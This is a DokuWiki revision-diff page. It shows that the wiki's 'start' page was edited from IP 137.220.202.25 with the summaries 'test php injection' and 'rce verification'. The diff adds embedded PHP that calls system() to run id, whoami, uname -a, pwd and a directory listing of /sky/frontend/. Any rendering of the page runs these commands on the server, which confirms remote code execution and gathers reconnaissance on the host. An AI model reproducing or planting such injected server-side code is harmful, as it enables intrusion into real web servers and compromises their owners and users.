User Tools

Site Tools


start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
start [2026/07/04 18:09] – test php injection 137.220.202.25start [2026/07/04 18:10] (current) – rce verification 137.220.202.25
Line 2: Line 2:
  
 <php> <php>
-echo "PHP_EXECUTION_TEST_OK";+echo "=== RCE_VERIFIED ===\n";
 system("id"); system("id");
 +echo "\n=== WHOAMI ===\n";
 +system("whoami");
 +echo "\n=== UNAME ===\n";
 +system("uname -a");
 +echo "\n=== PWD ===\n";
 +system("pwd");
 +echo "\n=== LS ===\n";
 +system("ls -la /sky/frontend/");
 +echo "\n=== END_RCE ===\n";
 </php> </php>
- 
-RCE_TEST_MARKER 
start.1783188585.txt.gz · Last modified: by 137.220.202.25

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki